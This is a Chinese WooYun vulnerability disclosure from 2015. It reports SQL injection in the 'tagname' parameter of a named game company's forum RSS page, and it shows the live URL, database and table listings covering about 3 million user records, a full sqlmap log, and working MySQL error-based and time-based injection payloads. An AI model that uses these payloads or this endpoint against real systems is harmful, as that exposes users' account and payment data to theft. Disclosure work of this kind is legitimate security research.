当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144784

漏洞标题:第一波游戏某站存在SQL注入300万信息可跨库查询主站(涉及OA系统)

相关厂商:第一波游戏

漏洞作者: 路人甲

提交时间:2015-10-04 23:14

修复时间:2015-11-18 23:16

公开时间:2015-11-18 23:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

第一波游戏某站存在SQL注入300万信息可跨库查询主站(涉及OA系统)

详细说明:

注入点:
http://bbs.ebogame.com/rss.php?forumid=0&tagname=
slqmap截图:

1.jpg


【论坛数据库 23w+8w】
Database: 5ebo_ucenter
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| uc_members | 230374 |
| uc_memberfields | 142469 |
| uc_notelist | 1217 |
| uc_pm_members | 77 |
| uc_pm_indexes | 54 |
| uc_pm_lists | 40 |
| uc_settings | 26 |
| uc_newpm | 15 |
| uc_pm_messages_0 | 7 |
| uc_pm_messages_6 | 7 |
| uc_pm_messages_4 | 6 |
| uc_pm_messages_7 | 6 |
| uc_pm_messages_1 | 5 |
| uc_pm_messages_2 | 5 |
| uc_pm_messages_3 | 5 |
| uc_pm_messages_5 | 5 |
| uc_pm_messages_8 | 4 |
| uc_pm_messages_9 | 4 |
| uc_applications | 2 |
| uc_failedlogins | 1 |
| uc_protectedmembers | 1 |
+---------------------------------------+---------+
Database: 5ebo_bbs
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pre_ucenter_members | 87952 |
| ebogame_member_info | 87798 |
| ebogame_member_info_copy | 83881 |
| pre_common_district | 45051 |
| anhei_activate_num | 43500 |
| pre_forum_post | 27341 |
| anhei_member | 21395 |
| anhei_packs_num | 20000 |
| pre_forum_filter_post | 12427 |
| ebogame_phone_code | 9254 |
| pre_home_notification | 7898 |
| pre_forum_threadpartake | 7626 |
| pre_common_credit_rule_log | 7442 |
| pre_common_member | 7273 |
| pre_common_member_count | 7273 |
| pre_common_member_field_forum | 7273 |
| pre_common_member_field_home | 7273 |
| pre_common_member_profile | 7273 |
| pre_common_member_status | 7273 |
| pre_forum_thread | 5991 |
| ebogame_member_money | 5648 |
| pre_common_onlinetime | 4244 |
| pre_forum_statlog | 3520 |
| pre_forum_threadmod | 3396 |
| ebogame_charge | 2537 |
| pre_forum_sofa | 1490 |
| ebogame_orderhistory | 1400 |
| pre_common_member_newprompt | 1340 |
| pre_forum_attachment | 1296 |
| pre_forum_pollvoter | 1174 |
| pre_forum_threadlog | 1019 |
| pre_ucenter_memberfields | 888 |
| pre_common_member_archive | 706 |
| pre_ucenter_pm_members | 647 |
| ebogame_member_findpass | 588 |
| pre_common_stat | 484 |
| pre_common_setting | 444 |
| pre_forum_threadimage | 424 |
| pre_ucenter_pm_indexes | 420 |
| pre_common_tagitem | 346 |
| pre_ucenter_pm_lists | 329 |
| pre_forum_attachment_8 | 296 |
| pre_forum_postlog | 228 |
| pre_forum_attachment_unused | 221 |
| pre_forum_threadhot | 151 |
| pre_qqy_ltnclog | 143 |
| pre_forum_attachment_1 | 122 |
| pre_forum_attachment_7 | 122 |
| pre_common_member_crime | 121 |
| pre_common_syscache | 121 |
| pre_common_tag | 115 |
| pre_forum_rsscache | 110 |
| pre_common_block_style | 103 |
| pre_common_member_temp___ | 100 |
| pre_forum_attachment_4 | 95 |
| pre_common_stylevar | 90 |
| pre_forum_attachment_6 | 89 |
| pre_common_member_action_log | 88 |
| pre_forum_attachment_0 | 88 |
| ebogame_charge_total | 87 |
| anhei_day_received | 85 |
| pre_common_smiley | 85 |
| pre_security_evilpost | 75 |
| pre_forum_attachment_5 | 73 |
| pre_common_connect_guest | 69 |
| pre_common_admincp_perm | 68 |
| pre_forum_newthread | 68 |
| pre_ucenter_newpm | 65 |
| pre_forum_attachment_2 | 64 |
| pre_forum_attachment_3 | 63 |
| pre_forum_threadcalendar | 57 |
| pre_ucenter_pm_messages_2 | 55 |
| ebogame_charge_copy | 53 |
| pre_common_nav | 52 |
| pre_common_member_profile_setting | 51 |
| pre_forum_attachment_9 | 49 |
| pre_ucenter_pm_messages_3 | 47 |
| pre_connect_memberbindlog | 44 |
| pre_ucenter_pm_messages_7 | 44 |
| pre_forum_forumfield | 43 |
| pre_ucenter_pm_messages_4 | 43 |
| pre_forum_forum | 42 |
| pre_ucenter_pm_messages_9 | 41 |
| pre_ucenter_pm_messages_5 | 40 |
| pre_ucenter_pm_messages_6 | 39 |
| pre_ucenter_pm_messages_1 | 38 |
| pre_common_member_connect | 37 |
| pre_ucenter_pm_messages_0 | 37 |
| pre_home_friend_request | 36 |
| pre_ucenter_pm_messages_8 | 36 |
| pre_connect_postfeedlog | 35 |
| pre_common_optimizer | 34 |
| pre_common_credit_rule | 32 |
| pre_home_favorite | 32 |
| pre_forum_polloption | 31 |
| pre_ucenter_notelist | 31 |
| pre_forum_modwork | 29 |
| pre_ucenter_settings | 27 |
| pre_common_magic | 24 |
| ebogame_media_page_detail | 23 |
| anhei_activate_record | 21 |
| pre_forum_hotreply_member | 21 |
| pre_common_cron | 20 |
| pre_forum_hotreply_number | 19 |
| pre_forum_post_tableid | 18 |
| ebogame_media_page | 16 |
| pre_common_myapp | 16 |
| pre_common_usergroup | 16 |
| pre_common_usergroup_field | 16 |
| pre_home_click | 15 |
| pre_home_pokearchive | 15 |
| pre_common_plugin | 14 |
| pre_home_friend | 14 |
| pre_home_poke | 14 |
| pre_security_eviluser | 13 |
| pre_common_statuser | 11 |
| pre_forum_postcomment | 11 |
| pre_connect_feedlog | 10 |
| pre_forum_medal | 10 |
| pre_common_report | 8 |
| pre_home_friendlog | 8 |
| ebogame_media_partners | 7 |
| pre_common_admincp_cmenu | 7 |
| pre_common_pluginvar | 7 |
| pre_common_admincp_member | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_forum_poll | 5 |
| pre_forum_poststick | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_common_admingroup | 3 |
| pre_common_friendlink | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_forum_postcache | 3 |
| pre_forum_warning | 3 |
| pre_security_failedlog | 3 |
| pre_common_advertisement | 2 |
| pre_common_block | 2 |
| pre_common_cache | 2 |
| pre_common_patch | 2 |
| pre_common_style | 2 |
| pre_common_template | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_mobile_setting | 2 |
| anhei_day_received_limited | 1 |
| ebogame_media_anomalydata | 1 |
| ebogame_media_setting | 1 |
| pre_common_admincp_session | 1 |
| pre_common_banned | 1 |
| pre_common_diy_data | 1 |
| pre_common_failedip | 1 |
| pre_common_failedlogin | 1 |
| pre_common_invite | 1 |
| pre_common_regip | 1 |
| pre_forum_thread_moderate | 1 |
| pre_forum_threadprofile | 1 |
| pre_forum_threadprofile_group | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_failedlogins | 1 |
+---------------------------------------+---------+
跨库查询:
【主站数据库 ebogame_member_info 33w+ 】
Database: ebogame_1
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ebogame_member_integral | 490201 |
| ebogame_member_login | 433668 |
| ebogame_activation | 400446 |
| ebogame_member_serv | 334756 |
| ebogame_member_info | 334038 |
| ebogame_member | 333889 |
| ebogame_advertising_click | 50020 |
| ebogame_charge | 39157 |
| ebogame_game_gift_code_17173 | 20000 |
| ebogame_member_char | 10680 |
| ebogame_game_code | 6210 |
| ebogame_game_gift_code | 5000 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 1793 |
| ebogame_news | 1588 |
| ebogame_extension_member | 1586 |
| ebogame_question_reply | 755 |
| ebogame_charge_heepay | 591 |
| ebogame_questions | 505 |
| ebogame_game_areas | 221 |
| ebogame_advertising | 73 |
| ebogame_category | 33 |
| ebogame_price | 33 |
| ebogame_extension_percent | 22 |
| ebogame_extension_settlemen | 21 |
| ebogame_games | 18 |
| ebogame_game_gift_info_17173 | 10 |
| ebogame_integral | 9 |
| ebogame_extension | 6 |
| ebogame_game_gift_info_ | 3 |
+---------------------------------------+---------+
【主站另一数据库 ebogame_member 233w+】
Database: ebogame
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ebogame_member_login | 4024633 |
| ebogame_member | 2336075 |
| ebogame_activation | 826828 |
| ebogame_member_integral | 674280 |
| pre_ucenter_members | 387637 |
| bbs_userlist | 326338 |
| ebogame_member_info | 277802 |
| ebogame_member_serv | 277792 |
| ebogame_member_char | 238784 |
| ebogame_charge | 169756 |
| api_send_mail | 61235 |
| ebogame_advertising_click | 51794 |
| pre_common_district | 45051 |
| ebogame_charge_copy | 43282 |
| pre_forum_post | 27728 |
| ebogame_game_gift_code_17173 | 20000 |
| pre_home_notification | 14233 |
| pre_common_credit_rule_log | 13011 |
| pre_forum_thread | 12229 |
| pre_forum_threadpartake | 10744 |
| pre_forum_threadmod | 9011 |
| pre_common_member_count | 8179 |
| pre_common_member_field_forum | 8179 |
| pre_common_member_field_home | 8179 |
| pre_common_member_profile | 8179 |
| pre_common_member_status | 8179 |
| pre_common_member | 8171 |
| pre_common_onlinetime | 6443 |
| ebogame_game_code | 6210 |
| bbs_posts | 5153 |
| ebogame_game_gift_code | 5000 |
| pre_ucenter_memberfields | 4808 |
| pre_forum_statlog | 4266 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 2638 |
| ebogame_extension_member | 2555 |
| ebogame_news | 2288 |
| bbs_apclog | 2054 |
| ebogame_question_reply | 1668 |
| pre_forum_attachment | 1566 |
| pre_forum_pollvoter | 1455 |
| bbs_actlogs | 1449 |
| pre_common_member_crime | 1239 |
| pre_forum_modwork | 1003 |
| pre_common_stat | 892 |
| bbs_threads | 870 |
| ebogame_questions | 779 |
| pre_forum_thread_moderate | 653 |
| ebogame_charge_heepay | 591 |
| bbs_primsg | 517 |
| pre_common_member_action_log | 496 |
| pre_ucenter_pm_indexes | 419 |
| pre_forum_threadimage | 405 |
| pre_common_setting | 392 |
| ebogame_game_areas | 358 |
| pre_forum_polloption | 273 |
| pre_forum_threaddisablepos | 244 |
| pre_ucenter_pm_members | 244 |
| pre_forum_attachment_1 | 222 |
| pre_forum_attachment_3 | 212 |
| pre_forum_attachment_4 | 180 |
| pre_forum_post_tableid | 174 |
| pre_forum_attachment_9 | 168 |
| pre_forum_attachment_5 | 161 |
| sglj_extension | 154 |
| ebogame_advertising | 151 |
| pre_ucenter_pm_lists | 129 |
| pre_forum_attachment_7 | 124 |
| pre_common_tagitem | 118 |
| bbs_ugoptlist | 115 |
| pre_ucenter_pm_messages_0 | 114 |
| pre_forum_attachment_6 | 106 |
| pre_common_block_style | 103 |
| pre_forum_attachment_unused | 103 |
| pre_forum_attachment_0 | 102 |
| pre_forum_attachment_2 | 102 |
| pre_common_syscache | 95 |
| pre_ucenter_notelist | 90 |
| pre_common_smiley | 85 |
| pre_forum_attachment_8 | 85 |
| pre_forum_rsscache | 80 |
| pre_ucenter_pm_messages_3 | 70 |
| pre_common_admincp_perm | 67 |
| pre_common_member_profile_setting | 51 |
| pre_forum_poll | 49 |
| pre_ucenter_pm_messages_7 | 49 |
| pre_common_tag | 48 |
| pre_common_nav | 47 |
| pre_common_stylevar | 45 |
| pre_ucenter_newpm | 40 |
| pre_forum_forumfield | 38 |
| pre_forum_forum | 37 |
| pre_common_credit_log | 36 |
| pre_ucenter_pm_messages_5 | 35 |
| ebogame_category | 33 |
| ebogame_price | 33 |
| pre_home_friend | 32 |
| pre_common_credit_rule | 31 |
| pre_ucenter_failedlogins | 31 |
| pre_ucenter_pm_messages_2 | 31 |
| pre_home_friend_request | 30 |
| pre_ucenter_pm_messages_6 | 29 |
| pre_ucenter_settings | 26 |
| bbs_emoticons | 25 |
| ebogame_games | 25 |
| pre_ucenter_pm_messages_4 | 25 |
| bbs_search | 23 |
| pre_ucenter_pm_messages_8 | 23 |
| ebogame_extension_percent | 22 |
| pre_ucenter_pm_messages_9 | 22 |
| ebogame_extension_settlemen | 21 |
| pre_ucenter_pm_messages_1 | 21 |
| pre_common_cron | 18 |
| pre_common_failedlogin | 17 |
| pre_common_usergroup | 16 |
| pre_common_usergroup_field | 16 |
| pre_home_friendlog | 16 |
| bbs_forumdata | 15 |
| bbs_tags | 15 |
| pre_home_click | 15 |
| pre_common_report | 14 |
| pre_forum_threadclosed | 14 |
| bbs_contacts | 13 |
| pre_forum_replycredit | 13 |
| bbs_levels | 12 |
| pre_common_banned | 12 |
| pre_common_session | 12 |
| pre_forum_poststick | 11 |
| ebogame_game_gift_info_17173 | 10 |
| pre_forum_medal | 10 |
| ebogame_integral | 9 |
| pre_common_plugin | 9 |
| pre_home_favorite | 9 |
| bbs_usergroup | 8 |
| bbs_polls | 7 |
| pre_forum_warning | 7 |
| ebogame_extension | 6 |
| pre_common_pluginvar | 6 |
| pre_forum_moderator | 6 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_common_admingroup | 4 |
| pre_common_advertisement | 4 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| ebogame_game_gift_info_ | 3 |
| pre_common_admincp_member | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_common_admincp_cmenu | 2 |
| pre_common_block | 2 |
| pre_common_credit_rule_log_field | 2 |
| pre_common_diy_data | 2 |
| pre_common_patch | 2 |
| pre_common_regip | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_home_poke | 2 |
| pre_home_pokearchive | 2 |
| pre_mobile_setting | 2 |
| bbs_favorites | 1 |
| bbs_lastest | 1 |
| pre_common_admincp_session | 1 |
| pre_common_cache | 1 |
| pre_common_statuser | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
【同时OA和分站数据库】
20w+
【总计大约300w]

漏洞证明:

【sqlmap全过程】

[17:28:38] [INFO] testing connection to the target URL
[17:28:38] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[17:28:39] [INFO] target URL is stable
[17:28:39] [INFO] testing if GET parameter 'forumid' is dynamic
[17:28:39] [INFO] confirming that GET parameter 'forumid' is dynamic
[17:28:39] [WARNING] GET parameter 'forumid' does not appear dynamic
[17:28:39] [WARNING] heuristic (basic) test shows that GET parameter 'forumid' m
ight not be injectable
[17:28:39] [INFO] testing for SQL injection on GET parameter 'forumid'
[17:28:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:28:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:28:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:28:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[17:28:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[17:28:42] [INFO] testing 'MySQL inline queries'
[17:28:42] [INFO] testing 'PostgreSQL inline queries'
[17:28:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:28:42] [INFO] testing 'Oracle inline queries'
[17:28:42] [INFO] testing 'SQLite inline queries'
[17:28:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:28:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:28:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:28:43] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:28:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:28:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:28:44] [INFO] testing 'Oracle AND time-based blind'
[17:28:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:28:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:28:49] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[17:28:53] [WARNING] GET parameter 'forumid' is not injectable
[17:28:53] [INFO] testing if GET parameter 'tagname' is dynamic
[17:28:53] [INFO] confirming that GET parameter 'tagname' is dynamic
[17:28:53] [INFO] GET parameter 'tagname' is dynamic
[17:28:53] [INFO] heuristic (basic) test shows that GET parameter 'tagname' migh
t be injectable (possible DBMS: 'MySQL')
[17:28:53] [INFO] heuristic (XSS) test shows that GET parameter 'tagname' might
be vulnerable to XSS attacks
[17:28:53] [INFO] testing for SQL injection on GET parameter 'tagname'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1) values? [Y/n]
[17:29:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:05] [WARNING] reflective value(s) found and filtering out
[17:29:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[17:29:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[17:29:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[17:29:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[17:29:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[17:29:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[17:29:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[17:29:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[17:29:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:29:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:29:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:29:11] [INFO] GET parameter 'tagname' is 'MySQL >= 5.0 AND error-based - WHE
RE or HAVING clause' injectable
[17:29:11] [INFO] testing 'MySQL inline queries'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:29:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:29:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[17:29:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[17:29:14] [INFO] GET parameter 'tagname' seems to be 'MySQL < 5.0.12 AND time-b
ased blind (heavy query)' injectable
[17:29:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:29:14] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:29:15] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[17:29:58] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. '--dbms=mysql')
[17:29:58] [INFO] testing 'MySQL UNION query (43) - 22 to 40 columns'
[17:30:00] [INFO] testing 'MySQL UNION query (43) - 42 to 60 columns'
[17:30:01] [INFO] testing 'MySQL UNION query (43) - 62 to 80 columns'
[17:30:02] [INFO] testing 'MySQL UNION query (43) - 82 to 100 columns'
[17:30:04] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
GET parameter 'tagname' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N]
sqlmap identified the following injection points with a total of 440 HTTP(s) req
uests:
---
Parameter: tagname (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: forumid=0&tagname=' AND (SELECT 1938 FROM(SELECT COUNT(*),CONCAT(0x
716a6a7871,(SELECT (CASE WHEN (1938=1938) THEN 1 ELSE 0 END)),0x7178627a71,FLOOR
(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HpMu'='H
pMu
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: forumid=0&tagname=' AND 3393=BENCHMARK(5000000,MD5(0x7a776b4d)) AND
'ttsm'='ttsm
---
[17:30:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)